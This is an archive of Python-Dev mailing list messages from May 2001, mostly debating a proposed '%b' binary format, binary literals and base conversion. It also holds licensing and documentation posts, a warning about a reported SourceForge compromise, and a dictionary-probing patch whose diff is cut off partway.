Message-ID: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>

I would like to add a "%b" format for converting
numbers to binary format (1's and 0's).  I realize
this isn't a C-ism, but it would be very useful for
teaching purposes, as newcomers find 101101 a lot
easier to understand than 0x2D.

Reactions?

Greg




From esr@thyrsus.com  Wed May 30 22:28:38 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:28:38 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>; from Greg.Wilson@baltimore.com on Wed, May 30, 2001 at 05:11:16PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>
Message-ID: <20010530172838.A778@thyrsus.com>

Greg Wilson <Greg.Wilson@baltimore.com>:
> I would like to add a "%b" format for converting
> numbers to binary format (1's and 0's).  I realize
> this isn't a C-ism, but it would be very useful for
> teaching purposes, as newcomers find 101101 a lot
> easier to understand than 0x2D.
> 
> Reactions?

+1.  Didactically pretty useful, and the additional code won't boost
global complexity much.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Where rights secured by the Constitution are involved, there can be no
rule making or legislation which would abrogate them.
        -- Miranda vs. Arizona, 384 US 436 p. 491


From tim.one@home.com  Wed May 30 22:30:49 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 17:30:49 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <20010530131424.Y690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>

[Thomas Wouters]
> This raises an interesting point. Do we want separate pieces of the
> Python distribution to have separate licences ?

This is a question for the PSF to resolve, since the PSF is intended to
become the sole legal owner of Python's IP rights.

My position will be that nothing ships in the distribution unless copyright
has been assigned to the PSF, or the contributor has agreed to give the PSF
a non-exclusive irrevocable etc license to release their work under the PSF
license du jour.  Fleshing out the second option so as to prevent abuse on
either side is going to require significant effort ("what if the PSF goes
away?", "what if the PSF changes its license to something I hate?", "what if
I change my mind?", etc).

Unfortunately, significant effort takes significant time too, and nobody has
started on this yet.


From mal@lemburg.com  Wed May 30 22:31:06 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 30 May 2001 23:31:06 +0200
Subject: [Python-Dev] %b format?
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com>
Message-ID: <3B15669A.43B70A44@lemburg.com>

"Eric S. Raymond" wrote:
> 
> Greg Wilson <Greg.Wilson@baltimore.com>:
> > I would like to add a "%b" format for converting
> > numbers to binary format (1's and 0's).  I realize
> > this isn't a C-ism, but it would be very useful for
> > teaching purposes, as newcomers find 101101 a lot
> > easier to understand than 0x2D.
> >
> > Reactions?
> 
> +1.  Didactically pretty useful, and the additional code won't boost
> global complexity much.

Good idea. The only question I have is: in which order will
you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?

I am thinking of adding a bit field type to mxNumber and have
the same problem there...

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From esr@thyrsus.com  Wed May 30 22:42:22 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:42:22 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 05:30:49PM -0400
References: <20010530131424.Y690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>
Message-ID: <20010530174222.A1019@thyrsus.com>

Tim Peters <tim.one@home.com>:
> My position will be that nothing ships in the distribution unless copyright
> has been assigned to the PSF, or the contributor has agreed to give the PSF
> a non-exclusive irrevocable etc license to release their work under the PSF
> license du jour.  Fleshing out the second option so as to prevent abuse on
> either side is going to require significant effort ("what if the PSF goes
> away?", "what if the PSF changes its license to something I hate?", "what if
> I change my mind?", etc).
> 
> Unfortunately, significant effort takes significant time too, and nobody has
> started on this yet.

I think a PSF pledge to use only an OSI-certified license would address
some of these issues.  Write it into the bylaws if necessary.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

He that would make his own liberty secure must guard even his enemy from
oppression: for if he violates this duty, he establishes a precedent that
will reach unto himself.
	-- Thomas Paine


From esr@thyrsus.com  Wed May 30 22:44:57 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:44:57 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <3B15669A.43B70A44@lemburg.com>; from mal@lemburg.com on Wed, May 30, 2001 at 11:31:06PM +0200
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> <3B15669A.43B70A44@lemburg.com>
Message-ID: <20010530174457.B1019@thyrsus.com>

M.-A. Lemburg <mal@lemburg.com>:
> > > I would like to add a "%b" format for converting
> > > numbers to binary format (1's and 0's).  I realize
> > > this isn't a C-ism, but it would be very useful for
> > > teaching purposes, as newcomers find 101101 a lot
> > > easier to understand than 0x2D.
> > 
> > +1.  Didactically pretty useful, and the additional code won't boost
> > global complexity much.
> 
> Good idea. The only question I have is: in which order will
> you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?
> 
> I am thinking of adding a bit field type to mxNumber and have
> the same problem there...

For *this* context, we clearly want mathematical notation; MSB to the left
and no byte-swapping.  After all we'd actually be printing numerals, not 
dumping a bitfield.
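A small sketch of the distinction, assuming non-negative integers (the function names are hypothetical): indexing bits from 0 naturally yields them LSB first, and the printed numeral is simply that list reversed. Greg's 0x2D example happens to be a binary palindrome (101101), so 12 is used to show the order.

```python
def bits_lsb_first(n):
    """Bits of a non-negative int in bit-index order: bit 0 first."""
    bits = []
    while n:
        bits.append(n & 1)
        n >>= 1
    return bits or [0]


def binary_numeral(n):
    """Mathematical notation: most significant bit on the left."""
    return "".join(str(b) for b in reversed(bits_lsb_first(n)))


print(bits_lsb_first(12))    # [0, 0, 1, 1]
print(binary_numeral(12))    # 1100
print(binary_numeral(0x2D))  # 101101
```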
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The people of the various provinces are strictly forbidden to have in their
possession any swords, short swords, bows, spears, firearms, or other types
of arms. The possession of unnecessary implements makes difficult the
collection of taxes and dues and tends to foment uprisings.
        -- Toyotomi Hideyoshi, dictator of Japan, August 1588


From barry@digicool.com  Wed May 30 22:49:22 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 17:49:22 -0400
Subject: [Python-Dev] %b format?
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>
Message-ID: <15125.27362.431144.886216@anthem.wooz.org>

>>>>> "GW" == Greg Wilson <Greg.Wilson@baltimore.com> writes:

    GW> I would like to add a "%b" format for converting numbers to
    GW> binary format (1's and 0's).

For completeness, wouldn't you also want a binary integer literal so
your students could write binary numbers in their code?  And what
about a binary() operator a la hex()?

-Barry


From tim.one@home.com  Wed May 30 22:50:31 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 17:50:31 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <3B15669A.43B70A44@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>

[Greg Wilson]
> I would like to add a "%b" format for converting
> numbers to binary format (1's and 0's).

-0, due to compound lumpiness:  hex() is to %x is to __hex__ as oct() is to
%o is to __oct__ as nothing is to %b is to nothing.  In that respect it's
unfortunate that Python has distinct nb_oct and nb_hex slots in the
PyNumberMethods struct (as opposed to a single parameterized "convert to
base N string" method).

[MAL]
> Good idea. The only question I have is: in which order will
> you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?

I'm sure Greg has in mind only integers, in which case %x and %o already
give the only useful <wink> answer.


From fdrake@cj42289-a.reston1.va.home.com  Wed May 30 22:51:22 2001
From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed, 30 May 2001 17:51:22 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010530215122.3738C28849@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

    http://python.sourceforge.net/devel-docs/

Update for development version of Python (2.2).

This update substantially re-works the prototype support for
productions of a formal grammar.  They look better, support forward
references to symbol definitions, and allow download of an all-text
version of the complete grammar (with productions ordered the same way
as they are in the documentation sources).

"Documenting Python" now includes documentation for the LaTeX markup
used to describe productions:

    http://python.sourceforge.net/devel-docs/doc/grammar-displays.html


From esr@thyrsus.com  Wed May 30 23:05:09 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:05:09 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 05:50:31PM -0400
References: <3B15669A.43B70A44@lemburg.com> <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>
Message-ID: <20010530180509.B1305@thyrsus.com>

Tim Peters <tim.one@home.com>:
> -0, due to compound lumpiness:  hex() is to %x is to __hex__ as oct() is to
> %o is to __oct__ as nothing is to %b is to nothing.  In that respect it's
> unfortunate that Python has distinct nb_oct and nb_hex slots in the
> PyNumberMethods struct (as opposed to a single parameterized "convert to
> base N string" method).

Is the right answer to add the convert-to-base slot and deprecate the
other two?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

If gun laws in fact worked, the sponsors of this type of legislation
should have no difficulty drawing upon long lists of examples of
criminal acts reduced by such legislation. That they cannot do so
after a century and a half of trying -- that they must sweep under the
rug the southern attempts at gun control in the 1870-1910 period, the
northeastern attempts in the 1920-1939 period, the attempts at both
Federal and State levels in 1965-1976 -- establishes the repeated,
complete and inevitable failure of gun laws to control serious crime.
        -- Senator Orrin Hatch, in a 1982 Senate Report


From fdrake@acm.org  Wed May 30 23:00:15 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 18:00:15 -0400 (EDT)
Subject: [Python-Dev] Most recent documentation update
Message-ID: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com>

  One thing I forgot to mention in my announcement of the update to
the development documentation which I just posted is that I went ahead
and converted all but one of the productions in the Reference Manual
to the new markup.  The print_stmt production, unfortunately, is given
twice instead of using a single model for the statement.  The
formatting tools don't support that (yet), and it's not clear that
they should.
  (No, Barry, don't go changing it...!)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From esr@thyrsus.com  Wed May 30 23:03:41 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:03:41 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>; from barry@digicool.com on Wed, May 30, 2001 at 05:49:22PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <15125.27362.431144.886216@anthem.wooz.org>
Message-ID: <20010530180341.A1305@thyrsus.com>

Barry A. Warsaw <barry@digicool.com>:
> 
> >>>>> "GW" == Greg Wilson <Greg.Wilson@baltimore.com> writes:
> 
>     GW> I would like to add a "%b" format for converting numbers to
>     GW> binary format (1's and 0's).
> 
> For completeness, wouldn't you also want a binary integer literal so
> your students could write binary numbers in their code?  And what
> about a binary() operator a la hex()?

Barry is correct.  If we're going to do this, we ought to do it right and
support binary on a par with decimal, hex, and octal.  I favor this.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The direct use of physical force is so poor a solution to the problem of
limited resources that it is commonly employed only by small children and
great nations.
	-- David Friedman


From barry@digicool.com  Wed May 30 23:05:37 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 18:05:37 -0400
Subject: [Python-Dev] Most recent documentation update
References: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com>
Message-ID: <15125.28337.938136.505675@anthem.wooz.org>

>>>>> "Fred" == Fred L Drake, Jr <fdrake@acm.org> writes:

    Fred> (No, Barry, don't go changing it...!)

Oh darn, three whole days work wasted...

:)


From tim.one@home.com  Wed May 30 23:17:42 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 18:17:42 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>

Note that in Vyper (John Skaller's Python variant) these are legit integer
literals:

0b11111111 0B11111111
0o777      0O777
0d999      0D999
0xfFf      0XFFf

Vyper's octal notation is still ugly, but whoever first thought

    0777 != 777

was a "good idea" was certifiably insane <0.25 wink>.
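A sketch of how literals in the Vyper style listed above could be parsed, assuming the prefix letter alone selects the base (the helper name is hypothetical, and this is not Vyper's actual implementation). A bare leading zero means nothing here, so 0777 is just 777:

```python
# Prefix letter (either case) -> base; anything else is plain decimal.
_BASES = {"b": 2, "o": 8, "d": 10, "x": 16}


def parse_prefixed_int(literal):
    """Parse 0b/0o/0d/0x integer literals, either letter case."""
    text = literal.strip()
    if len(text) > 2 and text[0] == "0" and text[1].lower() in _BASES:
        return int(text[2:], _BASES[text[1].lower()])
    # No recognised prefix: decimal, so a leading zero is harmless.
    return int(text, 10)


for lit in ["0b11111111", "0B11111111", "0o777", "0O777",
            "0d999", "0D999", "0xfFf", "0XFFf", "0777"]:
    print(lit, parse_prefixed_int(lit))
```

Python itself later adopted the 0b and 0o prefixes alongside 0x (PEP 3127); there is no 0d.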


From tim.one@home.com  Wed May 30 23:29:33 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 18:29:33 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530180509.B1305@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>

[Eric S. Raymond]
> Is the right answer to add the convert-to-base slot and deprecate the
> other two?

That would fix "the other" lump here in Python, that e.g.

>>> int("111", 3)
13
>>>

has no inverse.  string->int is happy with any base in 2..36 inclusive, but
int->string is spelled via 3 different builtins covering only 3 of those
bases.
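For illustration, the missing inverse can be sketched in a few lines. to_base is a hypothetical helper, not an existing builtin; it uses the same 0-9a-z digit alphabet that int() accepts and emits the most significant digit first:

```python
import string

# The 36 digit symbols int(s, base) understands, in value order.
_DIGITS = string.digits + string.ascii_lowercase


def to_base(n, base):
    """Inverse of int(s, base) for 2 <= base <= 36 (MSB first)."""
    if not 2 <= base <= 36:
        raise ValueError("base must be in 2..36")
    if n == 0:
        return "0"
    sign = "-" if n < 0 else ""
    n = abs(n)
    digits = []
    while n:
        n, r = divmod(n, base)
        digits.append(_DIGITS[r])  # least significant digit first...
    return sign + "".join(reversed(digits))  # ...so reverse for output


print(to_base(13, 3))           # 111
print(int(to_base(13, 3), 3))   # 13
```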

It would be more *expedient* to add "just" a __bin__/nb_bin method + a way
to spell binary int literals + a %b format + a bin() builtin.

On the fifth hand, I doubt anyone would want to add new % format codes for
bases {2..36} - {2, 8, 10, 16}.

So it will remain lumpy no matter what.  I look forward to the PEP <wink>.


From esr@thyrsus.com  Wed May 30 23:38:33 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:38:33 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400
References: <15125.27362.431144.886216@anthem.wooz.org> <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>
Message-ID: <20010530183833.B1654@thyrsus.com>

Tim Peters <tim.one@home.com>:
> Vyper's octal notation is still ugly, but whoever first thought
> 
>     0777 != 777
> 
> was a "good idea" was certifiably insane <0.25 wink>.

For anyone who doesn't know the history behind this...  

The 0xxx notation was copied from PDP-11 assembler literals -- the
instruction-set design of the PDP-11 was such that most of the
instruction subfields fit in octal digits, so this convention made it
somewhat easier to read machine-code dumps.
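To illustrate the point, assuming the usual PDP-11 double-operand layout (a 4-bit opcode in bits 15-12, then a 3-bit addressing mode and a 3-bit register number for the source, and again for the destination), every operand field lands on exactly one octal digit. The helper name is hypothetical, and 010102 octal is assumed to be the encoding of MOV R1, R2:

```python
def pdp11_double_operand(word):
    """Split a 16-bit double-operand instruction word into its fields."""
    return {
        "opcode": (word >> 12) & 0o17,  # bits 15-12
        "src_mode": (word >> 9) & 0o7,  # bits 11-9: one octal digit
        "src_reg": (word >> 6) & 0o7,   # bits 8-6:  one octal digit
        "dst_mode": (word >> 3) & 0o7,  # bits 5-3:  one octal digit
        "dst_reg": word & 0o7,          # bits 2-0:  one octal digit
    }


word = 0o010102  # assumed encoding of MOV R1, R2
print(format(word, "06o"))  # 010102
print(pdp11_double_operand(word))
```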

While I'm at it, I should note that the design of the 11 was ancestral
to both the 8088 and 68000 microprocessors, and thus to essentially 
every new general-purpose computer designed in the last fifteen years.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"Are we to understand," asked the judge, "that you hold your own interests
above the interests of the public?"

"I hold that such a question can never arise except in a society of cannibals."
	-- Ayn Rand


From esr@thyrsus.com  Wed May 30 23:39:43 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:39:43 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:29:33PM -0400
References: <20010530180509.B1305@thyrsus.com> <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>
Message-ID: <20010530183943.C1654@thyrsus.com>

Tim Peters <tim.one@home.com>:
> [Eric S. Raymond]
> > Is the right answer to add the convert-to-base slot and deprecate the
> > other two?
> 
> That would fix "the other" lump here in Python, that e.g.
> 
> >>> int("111", 3)
> 13
> >>>
> 
> has no inverse.  string->int is happy with any base in 2..36 inclusive, but
> int->string is spelled via 3 different builtins covering only 3 of those
> bases.

That sounds like a strong argument to me.  
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The world is filled with violence. Because criminals carry guns, we
decent law-abiding citizens should also have guns. Otherwise they will
win and the decent people will lose.
        -- James Earl Jones


From nas@python.ca  Wed May 30 23:38:58 2001
From: nas@python.ca (Neil Schemenauer)
Date: Wed, 30 May 2001 15:38:58 -0700
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400
References: <15125.27362.431144.886216@anthem.wooz.org> <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>
Message-ID: <20010530153858.A21901@glacier.fnational.com>

Tim Peters wrote:
> Vyper's octal notation is still ugly, but whoever first thought
> 
>     0777 != 777
> 
> was a "good idea" was certifiably insane <0.25 wink>.

Ever used MacLisp or ZetaLisp?  There:

    777 == 0d511

If only we had been born with 8 or 16 fingers, right?

  Neil


From thomas@xs4all.net  Thu May 31 02:52:48 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Thu, 31 May 2001 03:52:48 +0200
Subject: [Python-Dev] SF hacked
Message-ID: <20010531035248.G690@xs4all.nl>

It *seems*, from this site:

http://66.92.75.28/~vladimir/themes-org.html

that SourceForge has been hacked, and more seriously than SF first admits
(if I'm to believe the arrogant spouting of some script-kiddie, anyway. :)
And the same goes for apache.org, it looks like. Anyway, if anyone connected
*from* any of sourceforge's machines to anywhere else, in the last couple of
months, they'll be well advised to change their passwords and check for
intruders. The same goes if you connected through ssh and (foolishly ;)
allowed ssh-agent forwarding to the SF machines. In that case, better check
all the machines that ssh-agent would give you unpassworded access to for
logins you don't recognize. The site above lists a number of sniffed
passwords, in case you want to check, but there's no reason for the hacker
not to have even more sniffed passwords lying about :)

And if you have a login on apache.org, you probably want to change your
password in any case.... the above listed site has what seems to be a copy
of the shadow password file.

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one@home.com  Thu May 31 04:53:53 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 30 May 2001 23:53:53 -0400
Subject: [Python-Dev] One more dict trick
Message-ID: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com>

This is a multi-part message in MIME format.

------=_NextPart_000_0006_01C0E963.C83DC7A0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

If anyone has an app known or suspected to be sensitive to dict timing,
please try the patch here.  Best I've been able to tell, it's a win.  But
it's a radical change in approach, so I don't want to rush it.

This gets rid of the polynomial machinery entirely, along with the branches
associated with updating the things, and the dictobject struct member
holding the table's poly.  Instead it relies on the fact that

    i = (5*i + 1) % n

is a full-period RNG whenever n is a power of 2 (that's what guarantees it
will visit every slot), but perturbs that by adding in a few bits from the
full hash code shifted right each time (that's what guarantees every bit of
the hash code eventually influences the probe sequence, avoiding simple
quadratic-time degenerate cases).
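A small Python model of the two claims, for checking them by hand (the function names are hypothetical). It assumes a non-negative hash, so the right shifts eventually drain perturb to zero as unsigned arithmetic would. The patch's i = (i << 2) + i + (incr & 0xf) + 1 is the same as 5*i + (incr & 0xf) + 1, and masking i at every step gives the same slots because n is a power of 2. Once the hash bits are used up, the update is exactly i = (5*i + 1) % n, so every slot is eventually visited:

```python
def is_full_period(n):
    """True if i -> (5*i + 1) % n visits all n slots starting from 0."""
    seen, i = set(), 0
    for _ in range(n):
        seen.add(i)
        i = (5 * i + 1) % n
    return len(seen) == n


def probe_slots(hash_value, mask, count):
    """First `count` slots probed for a non-negative hash in a table
    of size mask + 1 (a power of 2), following the patch's update
    i = 5*i + (perturb & 0xf) + 1, then perturb >>= 4."""
    i = hash_value & mask
    perturb = hash_value
    slots = [i]
    while len(slots) < count:
        i = (5 * i + (perturb & 0xF) + 1) & mask
        perturb >>= 4
        slots.append(i)
    return slots


print(all(is_full_period(2 ** k) for k in range(1, 13)))  # True
print(is_full_period(12))                                 # False
print(set(probe_slots(0x12345678, 31, 41)) == set(range(32)))  # True
```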

------=_NextPart_000_0006_01C0E963.C83DC7A0
Content-Type: text/plain;
	name="dict.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="dict.txt"

Index: Objects/dictobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/dictobject.c,v
retrieving revision 2.96
diff -c -r2.96 dictobject.c
*** Objects/dictobject.c	2001/05/27 07:39:22	2.96
--- Objects/dictobject.c	2001/05/31 03:29:23
***************
*** 85,123 ****
  iteration.
  */
  
- static long polys[] = {
- /*	4 + 3, */	/* first active entry if MINSIZE == 4 */
- 	8 + 3,		/* first active entry if MINSIZE == 8 */
- 	16 + 3,
- 	32 + 5,
- 	64 + 3,
- 	128 + 3,
- 	256 + 29,
- 	512 + 17,
- 	1024 + 9,
- 	2048 + 5,
- 	4096 + 83,
- 	8192 + 27,
- 	16384 + 43,
- 	32768 + 3,
- 	65536 + 45,
- 	131072 + 9,
- 	262144 + 39,
- 	524288 + 39,
- 	1048576 + 9,
- 	2097152 + 5,
- 	4194304 + 3,
- 	8388608 + 33,
- 	16777216 + 27,
- 	33554432 + 9,
- 	67108864 + 71,
- 	134217728 + 39,
- 	268435456 + 9,
- 	536870912 + 5,
- 	1073741824 + 83
- 	/* 2147483648 + 9 -- if we ever boost this to unsigned long */
- };
- 
  /* Object used as dummy key to fill deleted entries */
  static PyObject *dummy; /* Initialized by first call to newdictobject() */
  
--- 85,90 ----
***************
*** 168,174 ****
  	int ma_fill;  /* # Active + # Dummy */
  	int ma_used;  /* # Active */
  	int ma_size;  /* total # slots in ma_table */
- 	int ma_poly;  /* appopriate entry from polys vector */
  	/* ma_table points to ma_smalltable for small tables, else to
  	 * additional malloc'ed memory.  ma_table is never NULL!  This rule
  	 * saves repeated runtime null-tests in the workhorse getitem and
--- 135,140 ----
***************
*** 202,209 ****
  	(mp)->ma_table = (mp)->ma_smalltable;				\
  	(mp)->ma_size = MINSIZE;					\
  	(mp)->ma_used = (mp)->ma_fill = 0;				\
- 	(mp)->ma_poly = polys[0];					\
- 	assert(MINSIZE < (mp)->ma_poly && (mp)->ma_poly < MINSIZE*2);	\
      } while(0)
  
  PyObject *
--- 168,173 ----
***************
*** 252,257 ****
--- 216,240 ----
  a dictentry* for which the me_value field is NULL.  Exceptions are never
  reported by this function, and outstanding exceptions are maintained.
  */
+ 
+ /* #define DUMP_HASH_STUFF */
+ #ifdef DUMP_HASH_STUFF
+ static int nEntry = 0, nCollide = 0, nTrip = 0;
+ #define BUMP_ENTRY ++nEntry
+ #define BUMP_COLLIDE ++nCollide
+ #define BUMP_TRIP ++nTrip
+ #define PRINT_HASH_STUFF \
+ 	if ((nEntry & 0x1ff) == 0) \
+ 		fprintf(stderr, "%d %d %d\n", nEntry, nCollide, nTrip)
+ 
+ #else
+ #define BUMP_ENTRY
+ #define BUMP_COLLIDE
+ #define BUMP_TRIP
+ #define PRINT_HASH_STUFF
+ #endif
+ 
+ 
  static dictentry *
  lookdict(dictobject *mp, PyObject *key, register long hash)
  {
***************
*** 265,270 ****
--- 248,254 ----
  	register int checked_error = 0;
  	register int cmp;
  	PyObject *err_type, *err_value, *err_tb;
+ 	BUMP_ENTRY;
  	/* We must come up with (i, incr) such that 0 <= i < ma_size
  	   and 0 < incr < ma_size and both are a function of hash.
  	   i is the initial table index and incr the initial probe offset. */
***************
*** 294,309 ****
  		}
  		freeslot = NULL;
  	}
! 	/* Derive incr from hash, just to make it more arbitrary. Note that
! 	   incr must not be 0, or we will get into an infinite loop.*/
! 	incr = hash ^ ((unsigned long)hash >> 3);
! 
  	/* In the loop, me_key == dummy is by far (factor of 100s) the
  	   least likely outcome, so test for that last. */
  	for (;;) {
! 		if (!incr)
! 			incr = 1; /* and incr will never be 0 again */
! 		ep = &ep0[(i + incr) & mask];
  		if (ep->me_key == NULL) {
  			if (restore_error)
  				PyErr_Restore(err_type, err_value, err_tb);
--- 278,292 ----
  		}
  		freeslot = NULL;
  	}
! 	incr = hash;
! 	BUMP_COLLIDE;
  	/* In the loop, me_key == dummy is by far (factor of 100s) the
  	   least likely outcome, so test for that last. */
  	for (;;) {
! 		BUMP_TRIP;
! 		i = (i << 2) + i + (incr & 0xf) + 1;
! 		incr >>= 4;
! 		ep = &ep0[i & mask];
  		if (ep->me_key == NULL) {
  			if (restore_error)
  				PyErr_Restore(err_type, err_value, err_tb);
***************
*** 335,344 ****
  		}
  		else if (ep->me_key == dummy && freeslot == NULL)
  			freeslot = ep;
- 		/* Cycle through GF(2**n). */
- 		if (incr & 1)
- 			incr ^= mp->ma_poly; /* clears the lowest bit */
- 		incr >>= 1;
  	}
  }
  
--- 318,323 ----
***************
*** 370,375 ****
--- 349,356 ----
  		mp->ma_lookup = lookdict;
  		return lookdict(mp, key, hash);
  	}
+ 	BUMP_ENTRY;
+ 	PRINT_HASH_STUFF;
  	/* We must come up with (i, incr) such that 0 <= i < ma_size
  	   and 0 < incr < ma_size and both are a function of hash */
  	i = hash & mask;
***************
*** 387,400 ****
  	}
  	/* Derive incr from hash, just to make it more arbitrary. Note that
  	   incr must not be 0, or we will get into an infinite loop.*/
! 	incr = hash ^ ((unsigned long)hash >> 3);
! 
  	/* In the loop, me_key == dummy is by far (factor of 100s) the
  	   least likely outcome, so test for that last. */
  	for (;;) {
! 		if (!incr)
! 			incr = 1; /* and incr will never be 0 again */
! 		ep = &ep0[(i + incr) & mask];
  		if (ep->me_key == NULL)
  			return freeslot == NULL ? ep : freeslot;
  		if (ep->me_key == key
--- 368,382 ----
  	}
  	/* Derive incr from hash, just to make it more arbitrary. Note that
  	   incr must not be 0, or we will get into an infinite loop.*/
! 	incr = hash;
! 	BUMP_COLLIDE;
  	/* In the loop, me_key == dummy is by far (factor of 100s) the
  	   least likely outcome, so test for that last. */
  	for (;;) {
! 		BUMP_TRIP;
! 		i = (i << 2) + i + (incr & 0xf) + 1;
! 		incr >>= 4;
! 		ep = &ep0[i  & mask];
  		if (ep->me_key == NULL)
  			return freeslot == NULL ? ep : freeslot;
  		if (ep->me_key == key
***************
*** 404,413 ****
  			return ep;
  		if (ep->me_key == dummy && freeslot == NULL)
  			freeslot = ep;
- 		/* Cycle through GF(2**n). */
- 		if (incr & 1)
- 			incr ^= mp->ma_poly; /* clears the lowest bit */
- 		incr >>= 1;
  	}
  }
  
--- 386,391 ----
***************
*** 448,454 ****
  static int
  dictresize(dictobject *mp, int minused)
  {
! 	int newsize, newpoly;
  	dictentry *oldtable, *newtable, *ep;
  	int i;
  	int is_oldtable_malloced;
--- 426,432 ----
  static int
  dictresize(dictobject *mp, int minused)
  {
! 	int newsize;
  	dictentry *oldtable, *newtable, *ep;
  	int i;
  	int is_oldtable_malloced;
***************
*** 456,475 ****
  
  	assert(minused >= 0);
  
! 	/* Find the smallest table size > minused, and its poly[] entry. */
! 	newpoly = 0;
! 	newsize = MINSIZE;
! 	for (i = 0; i < sizeof(polys)/sizeof(polys[0]); ++i) {
! 		if (newsize > minused) {
! 			newpoly = polys[i];
! 			break;
! 		}
! 		newsize <<= 1;
! 		if (newsize < 0)   /* overflow */
! 			break;
! 	}
! 	if (newpoly == 0) {
